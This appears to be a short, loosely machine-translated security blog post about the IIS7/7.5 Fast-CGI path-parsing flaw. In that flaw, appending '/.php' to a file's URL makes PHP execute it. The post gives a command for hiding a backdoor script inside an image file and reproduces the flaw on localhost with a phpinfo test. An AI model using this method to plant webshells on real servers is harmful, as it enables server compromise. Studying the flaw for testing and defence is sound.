Today met a IIS7.5 server, want to try to upload pictures horse. But since the environment did not, I did not use a little too long forgotten, simply review the built environment.
0x00 principle
IIS7 / 7.5 in the Fast-CGI mode of operation, in a file path (/xx.jpg) followed by /xx.php /xx.jpg/xx.php will parse a file for php. IIS and Nginx at this point is the same, one can see the URL file extension is .php, then regardless of whether the file exists, directly to the php processing, and php and enabled by default "cgi.fix_pathinfo", will file path "repair", the meaning of "repair"? For example, when encountered php file path "/aaa.xxx/bbb.yyy/ccc.zzz", if "/aaa.xxx/bbb.yyy/ccc.zzz" does not exist, it will remove the last " /ccc.zzz ", and then determine" /aaa.xxx/bbb.yyy "exists, if there is, put" /aaa.xxx/bbb.yyy "as file" /aaa.xxx/bbb.yyy/ccc. zzz ", if" /aaa.xxx/bbb.yyy "still exists, continue to remove the" /bbb.yyy ", and so on.
Common use method : After a map and a text file merge binary code backdoor malicious text written in the picture, be utilized.
Picture Horse production methods: copy xx.jpg / b + yy.txt / a cc.jpg
// b binary [binary mode]
// a ascii mode cc.jpg normal image files
0x01 ready condition
1. php.ini provided in
cgi.fix_pathinfo in php.ini Lane 1 =
Set in 2.IIS
Then restart the computer best
0x02 triggering process
First create a new txt text in the iis web directory, as follows
<?php phpinfo();?>
And then view the text in the browser txt, txt text directly display the contents out.
http://127.0.0.1/q/1.txt
Join the path at the end of the URL and at the end of the file PHP, successfully executed.
http://127.0.0.1/q/1.txt/.php
